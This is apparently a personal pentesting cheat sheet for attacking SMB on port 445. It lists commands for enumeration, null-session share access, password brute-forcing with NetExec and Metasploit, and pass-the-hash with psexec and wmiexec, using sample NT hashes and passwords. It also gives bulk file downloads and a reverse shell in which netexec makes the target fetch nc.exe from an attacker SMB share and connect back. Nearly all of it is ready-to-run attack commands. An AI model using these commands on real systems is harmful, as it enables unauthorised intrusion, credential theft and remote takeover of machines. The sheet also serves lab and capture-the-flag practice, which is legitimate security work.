445 - SMB | d4t4s3c hacks & pills

Information

Default Port: 445

PORT    STATE SERVICE
445/tcp open  mircosoft-ds

Enumeration

netexec smb 192.168.1.2

enum4linux 192.168.1.2

nmap -p445 -sS 192.168.1.2
nmap -p445 -sVC 192.168.1.2
nmap -p445 --script="smb-vuln*" 192.168.1.2
nmap -p445 --script="vuln and safe" 192.168.1.2
nmap -p445 --script="smb-enum-*" 192.168.1.2

Check Credentials

# password
netexec smb 192.168.1.2 -u peter -p Passsword1
netexec smb 192.168.1.2 -u peter -p Passsword1 --local-auth
# hash
netexec smb 192.168.1.2 -u peter -H <HASH>
netexec smb 192.168.1.2 -u peter -H <HASH> --local-auth

List

Null

# default port
smbclient -NL //192.168.1.2
rpcclient -NU "" 192.168.1.2 -c "netshareenum"   # absolute path
# other port
smbclient -NL //192.168.1.2 -p 1234
# (ERROR -> protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED)
smbclient -NL //192.168.1.2 --option="client min protocol=NT1"

smbmap -H 192.168.1.2 --no-banner
smbmap -H 192.168.1.2 -u '' -p '' --no-banner
                                                               
netexec smb 192.168.1.2 --shares
netexec smb 192.168.1.2 -u '' -p '' --shares

Auth

smbclient -L //192.168.1.2 -U "peter%Password1"
smbmap -H 192.168.1.2 -u peter -p Password1
netexec smb 192.168.1.2 -u peter -p Password1 --shares
# hash
pth-smbclient -L 192.168.1.2 -U 'peter%00000000000000000000000000000000:3B4C57484504038C2F2E94861D507BA7'

Access

Null

smbclient -N //192.168.1.2/share
smbmap -H 192.168.1.2 -r share
netexec smb 192.168.1.2 -u '' -p '' --spider share --regex .
# space
smbclient -N //192.168.1.2/'my share'
# (ERROR -> protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED)
smbclient -N //192.168.1.2/share --option="client min protocol=NT1"

Auth

smbclient -N //192.168.1.2/share -U "peter%Pasword1"
netexec smb 192.168.1.2 -u peter -p Password1 --spider share --regex .
smbmap -H 192.168.1.2 -u peter -p Password1 -r share
# hash
pth-smbclient //192.168.1.2/share -U 'peter%00000000000000000000000000000000:3B4C57484504038C2F2E94861D507BA7'
smbclient //192.168.1.2/share -U peter --pw-nt-hash '3B4C57484504038C2F2E94861D507BA7'
smbclient //192.168.1.2/share -U peter --pw-nt-hash 'F9FE0310AF66C797A73CB60B1953FCD7' -p 1234

Upload

# file
smbclient -N //192.168.1.2/folder
smb: \> put cmd.php

# files
smbclient -N //192.168.1.2/folder
smb: \> mput *

Download

smbmap -H 192.168.1.2 --download SYSVOL/Groups/Groups.xml
smbmap -H 192.168.1.2 -u peter -p Password1 --download share/secret.txt --no-banner
smbmap -H 192.168.1.2 -u peter -p Password1 --download 'users$/mhope/azure.xml'
smbmap -H 192.168.1.2 -u 'guest' -p '' --download Public/'SQL Server Procedures.pdf'

# file
smbclient -N //192.168.1.2/folder
smb: \> get file.zip

# all files
smbclient -N //192.168.1.2/folder
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

netexec smb 10.129.228.253 -u 'guest' -p '' --share Public --get-file "SQL Server Procedures.pdf" "SQLServerProcedures.pdf"

smbget -R smb://192.168.1.2/folder$ -U "peter%Password1"

Mount (CIFS)

mkdir /mnt/samba

# null
mount -t cifs //192.168.1.2/share /mnt/samba
# auth
mount -t cifs //192.168.1.2/share /mnt/samba -o username=peter,password='Pasword123!',rw

cd /mnt/samba
tree
umount /mnt/samba

Users

netexec smb 192.168.1.74 -u users.dic -p Password1

netexec smb 192.168.1.74 --users
netexec smb 192.168.1.74 -u '' -p '' --users

rpcclient -U "" -N 192.168.1.2 -c "enumdomusers"
rpcclient -U "" -N 192.168.1.2 -c "querydispinfo and enumdomusers"
rpcclient -U "" -N 192.168.1.2 -c "querydispinfo and enumdomusers" | awk '{print $8}'

enum4linux -U 192.168.1.2

for i in $(cat usernames.dic); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames $i'" ;done | grep "User"

RID

netexec smb 192.168.1.2 --rid-brute
netexec smb 192.168.1.2 -u '' -p '' --rid-brute

Linux

rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames root'           # default port
rpcclient -W '' -U ''%'' 192.168.1.2 -p 1234 -c 'lookupnames root'   # other port

root S-1-22-1-0 (User: 1)

# default port
for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupsids S-1-22-1-$i'" ;done
# other port
for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -p 1234 -c 'lookupsids S-1-22-1-$i'" ;done

S-1-22-1-1000 Unix User\dad (1)
S-1-22-1-1001 Unix User\mum (1)
S-1-22-1-1002 Unix User\baby (1)
S-1-22-1-1003 Unix User\1003 (1)
S-1-22-1-1004 Unix User\1004 (1)
S-1-22-1-1005 Unix User\1005 (1)

Windows

rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames administrator'
rpcclient -U 'administrator%Password123' 192.168.1.2 -c 'lookupnames administrador'

administrador S-1-5-21-172782897-4107608896-4177437455-500 (User: 1)

for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -v "unknown"
for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U 'administrador'%'Password123' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -v "unknown"
for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U 'administrador'%'Password123' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -vE "unknown|\(2\)|\(4\)"

Brute Force

Password

NetExec

netexec smb 192.168.1.2 -u peter -p rockyou.txt
netexec smb 192.168.1.2 -u peter -p rockyou.txt --continue-on-success
netexec smb 192.168.1.2 -u peter -p rockyou.txt --continue-on-success --ignore-pw-decoding
netexec smb 192.168.1.2 -u peter -p rockyou.txt --continue-on-success --no-bruteforce

Metasploit

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOST 192.168.1.2
msf6 auxiliary(scanner/smb/smb_login) > set SMBuser peter
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set VERBOSE false
msf6 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/smb/smb_login) > set THREADS 10
msf6 auxiliary(scanner/smb/smb_login) > run

PassTheHash (PtH)

pth-winexe -U WORKGROUP/admin%123456 //192.168.1.2 cmd.exe
pth-winexe -U WORKGROUP/admin%00000000000000000000000000000000:32ed87bdb5fdc5e9cba88547376818d4 //192.168.1.2 cmd.exe
wmiexec.py WORKGROUP/administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.129.1.147
impacket-psexec hutch.offsec/administrator:'xG/j06xg8TMg6I'@192.168.248.122
wmiexec.py WORKGROUP/administrator@10.129.1.147 -hashes ':2dcefe78334b42c0ce483b8e1b2886ab'
psexec.py domain.htb/admin:123456@192.168.1.2 cmd.exe
psexec.py WORKGROUP/admin@192.168.1.2 cmd.exe
psexec.py WORKGROUP/admin:123456@192.168.1.2 cmd.exe
psexec.py WORKGROUP/administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.129.1.147 cmd.exe
psexec.py -hashes ':32ed87bdb5fdc5e9cba88547376818d4' WORKGROUP/administrator@192.168.1.2 cmd.exe

Reverse Shell

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .
impacket-smbserver a $(pwd)
rlwrap nc -lvnp 443

# -x COMMAND            execute the specified command
# -X PS_COMMAND         execute the specified PowerShell command
netexec smb 192.168.1.2 -u 'administrator' -p Password1 -x '\\192.168.1.3\a\nc.exe -e cmd.exe 192.168.1.3 443'
netexec smb 192.168.1.2 -u 'administrator' -p Password1 -X '\\192.168.1.3\a\nc.exe -e cmd.exe 192.168.1.3 443'

Information

Enumeration

Check Credentials

Shares

List

Null

Auth

Access

Null

Auth

Upload

Download

Mount (CIFS)

Users

RID

Linux

Windows

Brute Force

Password

NetExec

Metasploit

PassTheHash (PtH)

Reverse Shell